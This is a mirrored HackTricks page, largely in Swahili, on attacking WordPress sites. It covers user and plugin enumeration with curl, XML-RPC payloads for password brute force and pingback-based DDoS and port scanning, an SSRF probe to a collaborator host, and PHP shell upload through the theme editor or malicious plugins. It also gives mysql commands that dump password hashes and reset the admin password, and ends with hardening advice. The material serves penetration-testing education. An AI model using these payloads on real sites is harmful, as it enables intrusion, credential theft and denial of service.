mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
400 lines
18 KiB
Markdown
400 lines
18 KiB
Markdown
# Wordpress
|
|
|
|
{{#include ../../banners/hacktricks-training.md}}
|
|
|
|
## Basic Information
|
|
|
|
- **Uploaded** files go to: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt`
|
|
- **Themes files can be found in /wp-content/themes/,** hivyo ikiwa unabadilisha baadhi ya php ya mandhari kupata RCE huenda ukatumia njia hiyo. Kwa mfano: Kutumia **theme twentytwelve** unaweza **access** faili ya **404.php** katika: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
|
|
|
|
- **Another useful url could be:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
|
|
|
|
- Katika **wp-config.php** unaweza kupata nenosiri la mzizi la database.
|
|
- Njia za kuingia za default za kuangalia: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/**_
|
|
|
|
### **Main WordPress Files**
|
|
|
|
- `index.php`
|
|
- `license.txt` ina taarifa muhimu kama toleo la WordPress lililosakinishwa.
|
|
- `wp-activate.php` inatumika kwa mchakato wa uanzishaji wa barua pepe wakati wa kuanzisha tovuti mpya ya WordPress.
|
|
- Folda za kuingia (zinaweza kubadilishwa jina ili kuficha):
|
|
- `/wp-admin/login.php`
|
|
- `/wp-admin/wp-login.php`
|
|
- `/login.php`
|
|
- `/wp-login.php`
|
|
- `xmlrpc.php` ni faili inayowakilisha kipengele cha WordPress kinachowezesha data kuhamasishwa kwa HTTP ikifanya kama njia ya usafirishaji na XML kama njia ya usimbaji. Aina hii ya mawasiliano imebadilishwa na [REST API](https://developer.wordpress.org/rest-api/reference) ya WordPress.
|
|
- Folda ya `wp-content` ndiyo directory kuu ambapo plugins na mandhari zinahifadhiwa.
|
|
- `wp-content/uploads/` Ni directory ambapo faili zozote zilizopakiwa kwenye jukwaa zinahifadhiwa.
|
|
- `wp-includes/` Hii ni directory ambapo faili za msingi zinahifadhiwa, kama vyeti, fonti, faili za JavaScript, na widgets.
|
|
- `wp-sitemap.xml` Katika toleo za Wordpress 5.5 na zaidi, WordPress inazalisha faili ya ramani ya XML yenye machapisho yote ya umma na aina za machapisho zinazoweza kuulizwa kwa umma na taxonomies.
|
|
|
|
**Post exploitation**
|
|
|
|
- Faili ya `wp-config.php` ina taarifa zinazohitajika na WordPress kuungana na database kama jina la database, mwenyeji wa database, jina la mtumiaji na nenosiri, funguo za uthibitishaji na chumvi, na kiambatisho cha jedwali la database. Faili hii ya usanidi pia inaweza kutumika kuanzisha hali ya DEBUG, ambayo inaweza kuwa na manufaa katika kutatua matatizo.
|
|
|
|
### Users Permissions
|
|
|
|
- **Administrator**
|
|
- **Editor**: Chapisha na simamia machapisho yake na ya wengine
|
|
- **Author**: Chapisha na simamia machapisho yake mwenyewe
|
|
- **Contributor**: Andika na simamia machapisho yake lakini hawezi kuyachapisha
|
|
- **Subscriber**: Angalia machapisho na hariri wasifu wao
|
|
|
|
## **Passive Enumeration**
|
|
|
|
### **Get WordPress version**
|
|
|
|
Angalia ikiwa unaweza kupata faili `/license.txt` au `/readme.html`
|
|
|
|
Ndani ya **source code** ya ukurasa (mfano kutoka [https://wordpress.org/support/article/pages/](https://wordpress.org/support/article/pages/)):
|
|
|
|
- grep
|
|
```bash
|
|
curl https://victim.com/ | grep 'content="WordPress'
|
|
```
|
|
- `meta name`
|
|
|
|
.png>)
|
|
|
|
- CSS link files
|
|
|
|
.png>)
|
|
|
|
- JavaScript files
|
|
|
|
.png>)
|
|
|
|
### Pata Plugins
|
|
```bash
|
|
curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep -E 'wp-content/plugins/' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
|
|
```
|
|
### Pata Mandhari
|
|
```bash
|
|
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
|
|
```
|
|
### Toa toleo kwa ujumla
|
|
```bash
|
|
curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
|
|
|
|
```
|
|
## Uainishaji wa Kazi
|
|
|
|
### Plugins na Mandhari
|
|
|
|
Huenda usiweze kupata Plugins na Mandhari zote zinazowezekana. Ili kugundua zote, utahitaji **kufanya Brute Force kwa orodha ya Plugins na Mandhari** (tunatumai kwetu kuna zana za kiotomatiki zinazoshikilia orodha hizi).
|
|
|
|
### Watumiaji
|
|
|
|
- **ID Brute:** Unapata watumiaji halali kutoka kwa tovuti ya WordPress kwa kufanya Brute Force kwa IDs za watumiaji:
|
|
```bash
|
|
curl -s -I -X GET http://blog.example.com/?author=1
|
|
```
|
|
Ikiwa majibu ni **200** au **30X**, hiyo ina maana kwamba id ni **halali**. Ikiwa jibu ni **400**, basi id ni **isiyo halali**.
|
|
|
|
- **wp-json:** Unaweza pia kujaribu kupata taarifa kuhusu watumiaji kwa kuuliza:
|
|
```bash
|
|
curl http://blog.example.com/wp-json/wp/v2/users
|
|
```
|
|
Nyingine `/wp-json/` kiunganishi ambacho kinaweza kufichua taarifa kuhusu watumiaji ni:
|
|
```bash
|
|
curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
|
|
```
|
|
Kumbuka kwamba kipengele hiki kinatoa tu watumiaji ambao wamefanya chapisho. **Taarifa tu kuhusu watumiaji ambao wana kipengele hiki kimewezeshwa zitapatikana**.
|
|
|
|
Pia kumbuka kwamba **/wp-json/wp/v2/pages** inaweza kuvuja anwani za IP.
|
|
|
|
- **Uainishaji wa jina la mtumiaji wa kuingia**: Wakati wa kuingia katika **`/wp-login.php`** ujumbe ni **tofauti** ikiwa **jina la mtumiaji lililoonyeshwa lipo au la**.
|
|
|
|
### XML-RPC
|
|
|
|
Ikiwa `xml-rpc.php` inafanya kazi unaweza kufanya shambulio la nguvu za nywila au kuitumia kuzindua mashambulizi ya DoS kwa rasilimali nyingine. (Unaweza kuendesha mchakato huu [ukitumia hii](https://github.com/relarizky/wpxploit) kwa mfano).
|
|
|
|
Ili kuona ikiwa inafanya kazi jaribu kufikia _**/xmlrpc.php**_ na kutuma ombi hili:
|
|
|
|
**Angalia**
|
|
```markup
|
|
<methodCall>
|
|
<methodName>system.listMethods</methodName>
|
|
<params></params>
|
|
</methodCall>
|
|
```
|
|
|
|
|
|
**Credentials Bruteforce**
|
|
|
|
**`wp.getUserBlogs`**, **`wp.getCategories`** au **`metaWeblog.getUsersBlogs`** ni baadhi ya mbinu zinazoweza kutumika kujaribu nguvu za nywila. Ikiwa unaweza kupata yoyote kati yao unaweza kutuma kitu kama:
|
|
```markup
|
|
<methodCall>
|
|
<methodName>wp.getUsersBlogs</methodName>
|
|
<params>
|
|
<param><value>admin</value></param>
|
|
<param><value>pass</value></param>
|
|
</params>
|
|
</methodCall>
|
|
```
|
|
Ujumbe _"Jina la mtumiaji au nenosiri si sahihi"_ ndani ya jibu la msimbo 200 unapaswa kuonekana ikiwa akidi haziko sahihi.
|
|
|
|
 (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (4) (1).png>)
|
|
|
|
.png>)
|
|
|
|
Kwa kutumia akidi sahihi unaweza kupakia faili. Katika jibu, njia itaonekana ([https://gist.github.com/georgestephanis/5681982](https://gist.github.com/georgestephanis/5681982))
|
|
```markup
|
|
<?xml version='1.0' encoding='utf-8'?>
|
|
<methodCall>
|
|
<methodName>wp.uploadFile</methodName>
|
|
<params>
|
|
<param><value><string>1</string></value></param>
|
|
<param><value><string>username</string></value></param>
|
|
<param><value><string>password</string></value></param>
|
|
<param>
|
|
<value>
|
|
<struct>
|
|
<member>
|
|
<name>name</name>
|
|
<value><string>filename.jpg</string></value>
|
|
</member>
|
|
<member>
|
|
<name>type</name>
|
|
<value><string>mime/type</string></value>
|
|
</member>
|
|
<member>
|
|
<name>bits</name>
|
|
<value><base64><![CDATA[---base64-encoded-data---]]></base64></value>
|
|
</member>
|
|
</struct>
|
|
</value>
|
|
</param>
|
|
</params>
|
|
</methodCall>
|
|
```
|
|
Pia kuna **njia ya haraka** ya kujaribu nguvu za nywila kwa kutumia **`system.multicall`** kwani unaweza kujaribu nywila kadhaa kwenye ombi moja:
|
|
|
|
<figure><img src="../../images/image (628).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
**Kupita 2FA**
|
|
|
|
Njia hii imekusudiwa kwa programu na si kwa wanadamu, na ni ya zamani, kwa hivyo haitegemei 2FA. Hivyo, ikiwa una nywila halali lakini mlango mkuu umewekwa chini ya ulinzi wa 2FA, **huenda ukawa na uwezo wa kutumia xmlrpc.php kuingia na nywila hizo ukipita 2FA**. Kumbuka kwamba huwezi kufanya vitendo vyote unavyoweza kufanya kupitia console, lakini huenda bado ukawa na uwezo wa kufikia RCE kama Ippsec anavyoeleza katika [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw&t=1130s)
|
|
|
|
**DDoS au skanning ya port**
|
|
|
|
Ikiwa unaweza kupata njia _**pingback.ping**_ ndani ya orodha unaweza kufanya Wordpress itume ombi la kiholela kwa mwenyeji/port yoyote.\
|
|
Hii inaweza kutumika kuomba **maelfu** ya **tovuti** za Wordpress **kuingia** kwenye **mahali** moja (hivyo **DDoS** inasababishwa katika mahali hapo) au unaweza kuitumia kufanya **Wordpress** i **scan** baadhi ya **mtandao** wa ndani (unaweza kuashiria port yoyote).
|
|
```markup
|
|
<methodCall>
|
|
<methodName>pingback.ping</methodName>
|
|
<params><param>
|
|
<value><string>http://<YOUR SERVER >:<port></string></value>
|
|
</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
|
|
</value></param></params>
|
|
</methodCall>
|
|
```
|
|
|
|
|
|
Ikiwa unapata **faultCode** yenye thamani **kubwa** kuliko **0** (17), inamaanisha kwamba bandari iko wazi.
|
|
|
|
Angalia matumizi ya **`system.multicall`** katika sehemu iliyopita kujifunza jinsi ya kutumia mbinu hii kusababisha DDoS.
|
|
|
|
**DDoS**
|
|
```markup
|
|
<methodCall>
|
|
<methodName>pingback.ping</methodName>
|
|
<params>
|
|
<param><value><string>http://target/</string></value></param>
|
|
<param><value><string>http://yoursite.com/and_some_valid_blog_post_url</string></value></param>
|
|
</params>
|
|
</methodCall>
|
|
```
|
|
.png>)
|
|
|
|
### wp-cron.php DoS
|
|
|
|
Hii faili kwa kawaida ipo chini ya mzizi wa tovuti ya Wordpress: **`/wp-cron.php`**\
|
|
Wakati faili hii inapo **fikiwa**, **query** ya MySQL "**nzito**" inafanywa, hivyo inaweza kutumika na **washambuliaji** ku **leta** **DoS**.\
|
|
Pia, kwa kawaida, `wp-cron.php` inaitwa kwenye kila upakiaji wa ukurasa (wakati wowote mteja anapohitaji ukurasa wowote wa Wordpress), ambayo kwenye tovuti zenye trafiki kubwa inaweza kusababisha matatizo (DoS).
|
|
|
|
Inapendekezwa kuzima Wp-Cron na kuunda cronjob halisi ndani ya mwenyeji inayofanya vitendo vinavyohitajika kwa muda wa kawaida (bila kusababisha matatizo).
|
|
|
|
### /wp-json/oembed/1.0/proxy - SSRF
|
|
|
|
Jaribu kufikia _https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net_ na tovuti ya Worpress inaweza kufanya ombi kwako.
|
|
|
|
Hii ndiyo jibu wakati haifanyi kazi:
|
|
|
|
.png>)
|
|
|
|
## SSRF
|
|
|
|
{{#ref}}
|
|
https://github.com/t0gu/quickpress/blob/master/core/requests.go
|
|
{{#endref}}
|
|
|
|
Chombo hiki kinachunguza ikiwa **methodName: pingback.ping** na kwa njia **/wp-json/oembed/1.0/proxy** na ikiwa inapatikana, inajaribu kuzi exploit.
|
|
|
|
## Vifaa vya Moja kwa Moja
|
|
```bash
|
|
cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
|
|
wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detection aggressive] --api-token <API_TOKEN> --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt #Brute force found users and search for vulnerabilities using a free API token (up 50 searchs)
|
|
#You can try to bruteforce the admin user using wpscan with "-U admin"
|
|
```
|
|
## Pata ufikiaji kwa kubadilisha kidogo
|
|
|
|
Zaidi ya shambulio halisi, hii ni udadisi. Kwenye CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man) unaweza kubadilisha kidogo 1 kutoka kwa faili yoyote ya wordpress. Hivyo unaweza kubadilisha nafasi `5389` ya faili `/var/www/html/wp-includes/user.php` ili NOP operesheni ya NOT (`!`).
|
|
```php
|
|
if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) {
|
|
return new WP_Error(
|
|
```
|
|
## **Panel RCE**
|
|
|
|
**Kubadilisha php kutoka kwa mandhari iliyotumika (nywila za admin zinahitajika)**
|
|
|
|
Muonekano → Mhariri wa Mandhari → Kiolezo cha 404 (kushoto)
|
|
|
|
Badilisha maudhui kuwa php shell:
|
|
|
|
.png>)
|
|
|
|
Tafuta mtandaoni jinsi ya kufikia ukurasa huo ulio sasishwa. Katika kesi hii unahitaji kufikia hapa: [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
|
|
|
|
### MSF
|
|
|
|
Unaweza kutumia:
|
|
```bash
|
|
use exploit/unix/webapp/wp_admin_shell_upload
|
|
```
|
|
to get a session.
|
|
|
|
## Plugin RCE
|
|
|
|
### PHP plugin
|
|
|
|
Inaweza kuwa inawezekana kupakia faili za .php kama plugin.\
|
|
Unda backdoor yako ya php kwa kutumia mfano:
|
|
|
|
.png>)
|
|
|
|
Kisha ongeza plugin mpya:
|
|
|
|
.png>)
|
|
|
|
Pakia plugin na bonyeza Install Now:
|
|
|
|
.png>)
|
|
|
|
Bonyeza Procced:
|
|
|
|
.png>)
|
|
|
|
Labda hii haitafanya chochote kwa kuonekana, lakini ukitembelea Media, utaona shell yako imepakuliwa:
|
|
|
|
.png>)
|
|
|
|
Fikia na utaona URL ya kutekeleza reverse shell:
|
|
|
|
.png>)
|
|
|
|
### Uploading and activating malicious plugin
|
|
|
|
Njia hii inahusisha ufungaji wa plugin mbaya inayojulikana kuwa na udhaifu na inaweza kutumika kupata web shell. Mchakato huu unafanywa kupitia dashibodi ya WordPress kama ifuatavyo:
|
|
|
|
1. **Plugin Acquisition**: Plugin inapatikana kutoka chanzo kama Exploit DB kama [**hapa**](https://www.exploit-db.com/exploits/36374).
|
|
2. **Plugin Installation**:
|
|
- Tembelea dashibodi ya WordPress, kisha nenda kwa `Dashboard > Plugins > Upload Plugin`.
|
|
- Pakia faili ya zip ya plugin uliyopakua.
|
|
3. **Plugin Activation**: Mara plugin inapofanikiwa kufungwa, inapaswa kuamshwa kupitia dashibodi.
|
|
4. **Exploitation**:
|
|
- Ikiwa plugin "reflex-gallery" imewekwa na kuamshwa, inaweza kutumika kwa sababu inajulikana kuwa na udhaifu.
|
|
- Mfumo wa Metasploit unatoa exploit kwa udhaifu huu. Kwa kupakia moduli inayofaa na kutekeleza amri maalum, kikao cha meterpreter kinaweza kuanzishwa, kikitoa ufikiaji usioidhinishwa kwa tovuti.
|
|
- Inabainishwa kuwa hii ni moja tu ya njia nyingi za kutumia udhaifu wa tovuti ya WordPress.
|
|
|
|
Maudhui yanajumuisha msaada wa picha unaoonyesha hatua katika dashibodi ya WordPress kwa ufungaji na uhamasishaji wa plugin. Hata hivyo, ni muhimu kutambua kuwa kutumia udhaifu kwa njia hii ni haramu na isiyo ya maadili bila idhini sahihi. Taarifa hii inapaswa kutumika kwa uwajibikaji na tu katika muktadha wa kisheria, kama vile pentesting kwa ruhusa wazi.
|
|
|
|
**Kwa hatua za kina zaidi angalia:** [**https://www.hackingarticles.in/wordpress-reverse-shell/**](https://www.hackingarticles.in/wordpress-reverse-shell/)
|
|
|
|
## From XSS to RCE
|
|
|
|
- [**WPXStrike**](https://github.com/nowak0x01/WPXStrike): _**WPXStrike**_ ni script iliyoundwa kuongeza **Cross-Site Scripting (XSS)** udhaifu hadi **Remote Code Execution (RCE)** au udhaifu mwingine muhimu katika WordPress. Kwa maelezo zaidi angalia [**hiki chapisho**](https://nowak0x01.github.io/papers/76bc0832a8f682a7e0ed921627f85d1d.html). Inatoa **msaada kwa Versions za Wordpress 6.X.X, 5.X.X na 4.X.X. na inaruhusu:**
|
|
- _**Privilege Escalation:**_ Inaunda mtumiaji katika WordPress.
|
|
- _**(RCE) Custom Plugin (backdoor) Upload:**_ Pakia plugin yako ya kawaida (backdoor) kwenye WordPress.
|
|
- _**(RCE) Built-In Plugin Edit:**_ Hariri Plugins za Built-In katika WordPress.
|
|
- _**(RCE) Built-In Theme Edit:**_ Hariri Mifumo ya Built-In katika WordPress.
|
|
- _**(Custom) Custom Exploits:**_ Custom Exploits kwa Plugins/Mifumo ya Tatu za WordPress.
|
|
|
|
## Post Exploitation
|
|
|
|
Extract usernames and passwords:
|
|
```bash
|
|
mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;select concat_ws(':', user_login, user_pass) from wp_users;"
|
|
```
|
|
Badilisha nenosiri la admin:
|
|
```bash
|
|
mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;"
|
|
```
|
|
## Wordpress Plugins Pentest
|
|
|
|
### Attack Surface
|
|
|
|
Kujua jinsi plugin ya Wordpress inavyoweza kufichua kazi ni muhimu ili kupata udhaifu katika kazi zake. Unaweza kupata jinsi plugin inaweza kufichua kazi katika alama zifuatazo na baadhi ya mifano ya plugins zenye udhaifu katika [**hiki kipande cha blog**](https://nowotarski.info/wordpress-nonce-authorization/).
|
|
|
|
- **`wp_ajax`** 
|
|
|
|
Moja ya njia ambazo plugin inaweza kufichua kazi ni kupitia waandishi wa AJAX. Hizi zinaweza kuwa na mantiki, udhibiti, au makosa ya uthibitishaji. Aidha, ni kawaida kwamba kazi hizi zitategemea uthibitishaji na ruhusa katika uwepo wa nonce ya wordpress ambayo **mtumiaji yeyote aliyeidhinishwa katika mfano wa Wordpress anaweza kuwa nayo** (bila kujali nafasi yake).
|
|
|
|
Hizi ndizo kazi ambazo zinaweza kutumika kufichua kazi katika plugin:
|
|
```php
|
|
add_action( 'wp_ajax_action_name', array(&$this, 'function_name'));
|
|
add_action( 'wp_ajax_nopriv_action_name', array(&$this, 'function_name'));
|
|
```
|
|
**Matumizi ya `nopriv` yanaufanya mwisho uweze kupatikana na watumiaji wowote (hata wasio na uthibitisho).**
|
|
|
|
> [!CAUTION]
|
|
> Zaidi ya hayo, ikiwa kazi inakagua tu uthibitisho wa mtumiaji kwa kutumia kazi `wp_verify_nonce`, kazi hii inakagua tu kama mtumiaji ameingia, kawaida haiangalii nafasi ya mtumiaji. Hivyo, watumiaji wenye mamlaka ya chini wanaweza kuwa na ufikiaji wa vitendo vya mamlaka ya juu.
|
|
|
|
- **REST API**
|
|
|
|
Pia inawezekana kufichua kazi kutoka wordpress kwa kujiandikisha AP ya rest kwa kutumia kazi `register_rest_route`:
|
|
```php
|
|
register_rest_route(
|
|
$this->namespace, '/get/', array(
|
|
'methods' => WP_REST_Server::READABLE,
|
|
'callback' => array($this, 'getData'),
|
|
'permission_callback' => '__return_true'
|
|
)
|
|
);
|
|
```
|
|
`permission_callback` ni callback kwa kazi inayokagua kama mtumiaji aliyepewa ruhusa kuita njia ya API.
|
|
|
|
**Ikiwa kazi ya ndani `__return_true` inatumika, itakosa tu kuangalia ruhusa za mtumiaji.**
|
|
|
|
- **Upatikanaji wa moja kwa moja wa faili ya php**
|
|
|
|
Kwa kweli, Wordpress inatumia PHP na faili ndani ya plugins zinapatikana moja kwa moja kutoka mtandao. Hivyo, ikiwa plugin inatoa kazi yoyote dhaifu inayoweza kuanzishwa kwa kuingia tu kwenye faili, itakuwa rahisi kutumiwa na mtumiaji yeyote.
|
|
|
|
## Ulinzi wa WordPress
|
|
|
|
### Sasisho za Kawaida
|
|
|
|
Hakikisha WordPress, plugins, na mandhari ziko katika hali ya kisasa. Pia thibitisha kwamba sasisho za kiotomatiki zimewezeshwa katika wp-config.php:
|
|
```bash
|
|
define( 'WP_AUTO_UPDATE_CORE', true );
|
|
add_filter( 'auto_update_plugin', '__return_true' );
|
|
add_filter( 'auto_update_theme', '__return_true' );
|
|
```
|
|
Pia, **sakinisha tu plugins na mandhari za WordPress zinazoweza kuaminika**.
|
|
|
|
### Plugins za Usalama
|
|
|
|
- [**Wordfence Security**](https://wordpress.org/plugins/wordfence/)
|
|
- [**Sucuri Security**](https://wordpress.org/plugins/sucuri-scanner/)
|
|
- [**iThemes Security**](https://wordpress.org/plugins/better-wp-security/)
|
|
|
|
### **Mapendekezo Mengine**
|
|
|
|
- Ondoa mtumiaji wa **admin** wa kawaida
|
|
- Tumia **nywila zenye nguvu** na **2FA**
|
|
- Mara kwa mara **kagua** ruhusa za watumiaji
|
|
- **Punguza majaribio ya kuingia** ili kuzuia mashambulizi ya Brute Force
|
|
- Badilisha jina la faili **`wp-admin.php`** na ruhusu ufikiaji tu ndani au kutoka anwani fulani za IP.
|
|
|
|
{{#include ../../banners/hacktricks-training.md}}
|